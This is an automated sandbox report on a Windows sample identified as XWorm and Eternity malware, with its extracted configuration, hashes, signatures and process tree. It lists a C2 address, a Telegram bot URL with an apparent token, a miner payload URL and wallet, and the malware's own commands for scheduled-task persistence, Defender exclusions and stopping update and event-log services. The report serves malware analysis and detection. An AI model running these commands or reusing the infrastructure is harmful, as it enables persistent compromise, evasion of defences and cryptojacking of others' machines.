eternity | a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d

Analysis

max time kernel
600s
max time network
602s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28-03-2024 00:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

x326.exe
Size

455KB
MD5

c8d9593196962fa5d706a207c16674cd
SHA1

686a8e674e6615d5cd91f7b2cba0c755054b3f69
SHA256

a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
SHA512

5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
SSDEEP

12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK

Score

10^/10

eternity xworm evasion persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.1

104.194.9.116:7000

Mutex

bUezpCDHVjUVS3W9

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845

aes.plain

Extracted

Family

eternity

Wallets

47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q

Attributes

payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe

Signatures

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/memory/2992-8-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral1/memory/2992-10-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral1/memory/2992-13-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral1/memory/2992-15-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral1/memory/2992-17-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity

Modifies security service 2 TTPs 3 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection = 22020100	svchost.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AHIMMUFK\ImagePath = "C:\\ProgramData\\xlffyhztkvzk\\pkiwizgebqxq.exe"	services.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 15 IoCs

pid	Process
1592	bljkwt.exe
2320	xspvep.exe
2568	CasPol.exe
1576	CasPol.exe
1004	xevhmv.exe
1316	fwxkur.exe
616	CasPol.exe
928	pkiwizgebqxq.exe
1576	CasPol.exe
936	CasPol.exe
1344	CasPol.exe
1436	CasPol.exe
2472	CasPol.exe
1632	CasPol.exe
1620	CasPol.exe

Loads dropped DLL 26 IoCs

pid	Process
2992	jsc.exe
2992	jsc.exe
1116	WerFault.exe
1116	WerFault.exe
1116	WerFault.exe
1116	WerFault.exe
1116	WerFault.exe
2756	WerFault.exe
2756	WerFault.exe
2756	WerFault.exe
2756	WerFault.exe
2756	WerFault.exe
2016	cmd.exe
2992	jsc.exe
2028	WerFault.exe
2028	WerFault.exe
2028	WerFault.exe
2028	WerFault.exe
2028	WerFault.exe
2992	jsc.exe
1256	WerFault.exe
1256	WerFault.exe
1256	WerFault.exe
1256	WerFault.exe
1256	WerFault.exe
472	services.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	ilasm.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1540 set thread context of 2992	1540	x326.exe	28
PID 1592 set thread context of 1340	1592	bljkwt.exe	36
PID 1004 set thread context of 2168	1004	xevhmv.exe	58
PID 1316 set thread context of 2160	1316	fwxkur.exe	61
PID 2160 set thread context of 2756	2160	ilasm.exe	86

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1436	sc.exe
920	sc.exe
2004	sc.exe
1796	sc.exe
3016	sc.exe
2348	sc.exe
1004	sc.exe
1948	sc.exe
3012	sc.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2524	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1924	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1540	x326.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
1004	xevhmv.exe
2160	ilasm.exe
2648	powershell.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	1540	x326.exe
Token: SeDebugPrivilege	2992	jsc.exe
Token: SeDebugPrivilege	1004	xevhmv.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeShutdownPrivilege	2976	powercfg.exe
Token: SeShutdownPrivilege	2728	powercfg.exe
Token: SeShutdownPrivilege	2996	powercfg.exe
Token: SeShutdownPrivilege	2720	powercfg.exe
Token: SeDebugPrivilege	2756	dialer.exe
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeAuditPrivilege	844	svchost.exe
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE
Token: SeShutdownPrivilege	1244	Explorer.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2476	conhost.exe
1668	conhost.exe
2436	conhost.exe
1568	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1540 wrote to memory of 2992	1540	x326.exe	28
PID 1540 wrote to memory of 2992	1540	x326.exe	28
PID 1540 wrote to memory of 2992	1540	x326.exe	28
PID 1540 wrote to memory of 2992	1540	x326.exe	28
PID 1540 wrote to memory of 2992	1540	x326.exe	28
PID 1540 wrote to memory of 2992	1540	x326.exe	28
PID 1540 wrote to memory of 2992	1540	x326.exe	28
PID 1540 wrote to memory of 2992	1540	x326.exe	28
PID 1540 wrote to memory of 2992	1540	x326.exe	28
PID 1540 wrote to memory of 2768	1540	x326.exe	29
PID 1540 wrote to memory of 2768	1540	x326.exe	29
PID 1540 wrote to memory of 2768	1540	x326.exe	29
PID 2992 wrote to memory of 1592	2992	jsc.exe	33
PID 2992 wrote to memory of 1592	2992	jsc.exe	33
PID 2992 wrote to memory of 1592	2992	jsc.exe	33
PID 2992 wrote to memory of 1592	2992	jsc.exe	33
PID 2992 wrote to memory of 2320	2992	jsc.exe	34
PID 2992 wrote to memory of 2320	2992	jsc.exe	34
PID 2992 wrote to memory of 2320	2992	jsc.exe	34
PID 2992 wrote to memory of 2320	2992	jsc.exe	34
PID 2320 wrote to memory of 2044	2320	xspvep.exe	35
PID 2320 wrote to memory of 2044	2320	xspvep.exe	35
PID 2320 wrote to memory of 2044	2320	xspvep.exe	35
PID 1592 wrote to memory of 1340	1592	bljkwt.exe	36
PID 1592 wrote to memory of 1340	1592	bljkwt.exe	36
PID 1592 wrote to memory of 1340	1592	bljkwt.exe	36
PID 1592 wrote to memory of 1340	1592	bljkwt.exe	36
PID 1592 wrote to memory of 1340	1592	bljkwt.exe	36
PID 1592 wrote to memory of 1340	1592	bljkwt.exe	36
PID 2320 wrote to memory of 2044	2320	xspvep.exe	35
PID 1592 wrote to memory of 1340	1592	bljkwt.exe	36
PID 2320 wrote to memory of 2044	2320	xspvep.exe	35
PID 1592 wrote to memory of 1340	1592	bljkwt.exe	36
PID 2320 wrote to memory of 2044	2320	xspvep.exe	35
PID 1592 wrote to memory of 1340	1592	bljkwt.exe	36
PID 2320 wrote to memory of 2044	2320	xspvep.exe	35
PID 2320 wrote to memory of 2044	2320	xspvep.exe	35
PID 2320 wrote to memory of 2044	2320	xspvep.exe	35
PID 1592 wrote to memory of 1116	1592	bljkwt.exe	37
PID 1592 wrote to memory of 1116	1592	bljkwt.exe	37
PID 1592 wrote to memory of 1116	1592	bljkwt.exe	37
PID 2320 wrote to memory of 3052	2320	xspvep.exe	38
PID 2320 wrote to memory of 3052	2320	xspvep.exe	38
PID 2320 wrote to memory of 3052	2320	xspvep.exe	38
PID 2320 wrote to memory of 3052	2320	xspvep.exe	38
PID 2320 wrote to memory of 3052	2320	xspvep.exe	38
PID 2320 wrote to memory of 3052	2320	xspvep.exe	38
PID 2320 wrote to memory of 3052	2320	xspvep.exe	38
PID 2320 wrote to memory of 3052	2320	xspvep.exe	38
PID 2320 wrote to memory of 3052	2320	xspvep.exe	38
PID 1340 wrote to memory of 2016	1340	CasPol.exe	39
PID 1340 wrote to memory of 2016	1340	CasPol.exe	39
PID 1340 wrote to memory of 2016	1340	CasPol.exe	39
PID 1340 wrote to memory of 2016	1340	CasPol.exe	39
PID 2016 wrote to memory of 2796	2016	cmd.exe	41
PID 2016 wrote to memory of 2796	2016	cmd.exe	41
PID 2016 wrote to memory of 2796	2016	cmd.exe	41
PID 2016 wrote to memory of 2796	2016	cmd.exe	41
PID 2016 wrote to memory of 1924	2016	cmd.exe	42
PID 2016 wrote to memory of 1924	2016	cmd.exe	42
PID 2016 wrote to memory of 1924	2016	cmd.exe	42
PID 2016 wrote to memory of 1924	2016	cmd.exe	42
PID 2320 wrote to memory of 2292	2320	xspvep.exe	43
PID 2320 wrote to memory of 2292	2320	xspvep.exe	43

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:424

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Loads dropped DLL
PID:472
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:600
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -Embedding
    3⤵
    PID:1228
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:684
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:760
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:816
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1196
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:844
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {546E9A06-A1DD-4086-B906-E88912C5EB74} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
    3⤵
    PID:380
  - - C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      4⤵
      Executes dropped EXE
      PID:1576
  - - C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      4⤵
      Executes dropped EXE
      PID:616
  - - C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      4⤵
      Executes dropped EXE
      PID:1576
  - - C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      4⤵
      Executes dropped EXE
      PID:936
  - - C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      4⤵
      Executes dropped EXE
      PID:1344
  - - C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      4⤵
      Executes dropped EXE
      PID:1436
  - - C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      4⤵
      Executes dropped EXE
      PID:2472
  - - C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      4⤵
      Executes dropped EXE
      PID:1632
  - - C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
      4⤵
      Executes dropped EXE
      PID:1620
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:996
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:344
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1028
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1056
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1132
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:3040
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2912
- C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe
  C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe
  2⤵
  - Executes dropped EXE
  PID:928

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1244
- C:\Users\Admin\AppData\Local\Temp\x326.exe
  "C:\Users\Admin\AppData\Local\Temp\x326.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1540
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2992
  - - C:\Users\Admin\AppData\Local\Temp\bljkwt.exe
      "C:\Users\Admin\AppData\Local\Temp\bljkwt.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1592
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1340
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"
        6⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2016
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2796
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        7⤵
        Runs ping.exe
        
        PID:1924
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f
        7⤵
        Creates scheduled task(s)
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
        
        "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"
        7⤵
        Executes dropped EXE
        
        PID:2568
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1592 -s 2104
        5⤵
        Loads dropped DLL
        
        PID:1116
  - - C:\Users\Admin\AppData\Local\Temp\xspvep.exe
      "C:\Users\Admin\AppData\Local\Temp\xspvep.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2320
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        
        PID:2044
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
        5⤵
        
        PID:3052
    - - C:\Program Files\Windows Mail\wab.exe
        
        "C:\Program Files\Windows Mail\wab.exe"
        5⤵
        
        PID:2292
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
        5⤵
        
        PID:2200
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
        5⤵
        
        PID:2072
    - - C:\Program Files\Windows Media Player\wmplayer.exe
        
        "C:\Program Files\Windows Media Player\wmplayer.exe"
        5⤵
        
        PID:1612
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
        5⤵
        
        PID:2548
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:2972
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
        5⤵
        
        PID:1188
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2320 -s 2160
        5⤵
        Loads dropped DLL
        
        PID:2756
  - - C:\Users\Admin\AppData\Local\Temp\xevhmv.exe
      "C:\Users\Admin\AppData\Local\Temp\xevhmv.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1004
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        
        PID:2168
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1004 -s 740
        5⤵
        Loads dropped DLL
        
        PID:2028
  - - C:\Users\Admin\AppData\Local\Temp\fwxkur.exe
      "C:\Users\Admin\AppData\Local\Temp\fwxkur.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:1316
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
        5⤵
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:2160
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:2916
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:2016
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3016
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:1948
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:2348
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:3012
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:1004
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2728
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2720
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2996
      - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "AHIMMUFK"
        6⤵
        Launches sc.exe
        
        PID:1436
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "AHIMMUFK" binpath= "C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:920
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:1796
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "AHIMMUFK"
        6⤵
        Launches sc.exe
        
        PID:2004
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1316 -s 2108
        5⤵
        Loads dropped DLL
        
        PID:1256
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1540 -s 740
    3⤵
    PID:2768

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-822821197-126515376014743294151828064972698698783-19375681721900033583-1521057996"
1⤵
PID:1216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-337420148-15515295831860204795-13041376271498582628-141056857-614649984-1762853620"
1⤵
PID:2212

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4851565692052093501-54377860327851219615045818981934939912-3116432471287789602"
1⤵
PID:2192

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-27710559019527452401822914344178143799-421115174171587990910728578922030507634"
1⤵
PID:1096

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-27712587936328024-16186781241801369011524119554-1609384859-1745600739666003536"
1⤵
PID:2016

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7881049241661751869-130274240506230994-351131453-13126643771801605045-1627618221"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2476

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1276869317-1064039909-1557986930803203633-9718801621508503310-458469213-1075689610"
1⤵
PID:2128

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1275269230-854050244864293281396433783-1489854177-21061488681648748651159383373"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1668

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "603524969100750626-869202976-116987522712132758631600084935-8438165851132294241"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2436

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-8646071561547889210-4507696471426581781-1352893324-708153086-10235581992096836965"
1⤵
PID:2500

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-9666914271677237469936817292-1413101980-150678743-7236436121062644698-848672274"
1⤵
PID:2748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2041716459-2067271629-33118639318791697601010651067202456918840037741795434639"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe

Filesize
92KB

MD5
7a92143cafb451f70ff9046a7c0cb50d

SHA1
7a96ebc991c0251f44b2d7a1172c001085a76a98

SHA256
89b20fad42700ae3b0b5b93aeb48eb180d286ba71de6f11bc77318bf35f9283a

SHA512
acd7760d8e1103e988e9e276a6b3b72b7922d328c1322ccf2b1e00342503bf069965ae886fc7c0b338f7ff17fc7aadea8abb9e526fcbf42899f0b878e5a83b3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\xevhmv.exe

Filesize
2.2MB

MD5
09445928ff039b1ef83022c8016a08b6

SHA1
9ccab9619a428b24fcb65f4cc1c8c57823bfba46

SHA256
408434c24b4f3e5ff2d9d1e7c0a9a97bd01a95e99e8006e73fa4a5a06d3c2556

SHA512
a54c08db931ad7cfcaaf5bc07dfe7ee6d9bb85211868b9bb24601832b2429bacc60b95014bc754b0ca87bab72b98afb0ce1185781916fa8a261053b452b14afd

Download Submit
C:\Users\Admin\AppData\Local\Temp\xevhmv.exe

Filesize
2.0MB

MD5
38affd9860c5a332aad73d0606633ff9

SHA1
11946f09b8b1be77b9785909c2d954b1d03f3a99

SHA256
66213b187bec75ba01012dbbbd006a33712a9117d3a7f29ff8a294e8858f636e

SHA512
01a89d2119acb69c7bc244fa3b2e74634d94794326c0bb9ca1388d7d570cbdbe050855c3b9ae677c5f90544a81e0be7b514bc1531434dc25f7757e955df36fe1

Download Submit
C:\Users\Admin\AppData\Local\Temp\xspvep.exe

Filesize
756KB

MD5
d76027fe4cfd48c7f8999c796e50e731

SHA1
5026422e84bf445e2d141529e2b808187a30d9f6

SHA256
148da274864c690a7c01119e025bdc0ab94fa9c110c30afb42e51b1c990a2799

SHA512
